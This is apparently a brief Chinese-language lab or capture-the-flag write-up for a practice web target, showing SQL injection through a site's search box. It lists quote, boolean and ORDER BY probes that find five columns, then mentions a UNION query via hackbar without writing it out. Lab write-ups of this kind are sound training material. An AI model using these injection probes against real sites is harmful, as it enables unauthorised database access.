靶场地址:Web漏洞渗透测试系统http://www.whalwl.host:8002/search.php
解题准备:本题需要使用wpsan,kali自带
解题思路:
1、首先登录,进入留言板,根据提示,通过搜索框进行注入
a' 页面异常
a' and 1=1 # 页面正常
a' order by 10 # 异常
a' order by 6 # 异常
a' order by 5 # 正常
确定字段数为5
2、使用hackbar,使用联合查询,如果在原网页提交查询,需要将get语句手动编码为URL编码
3、成功使用联合查询,后续注入不再赘述。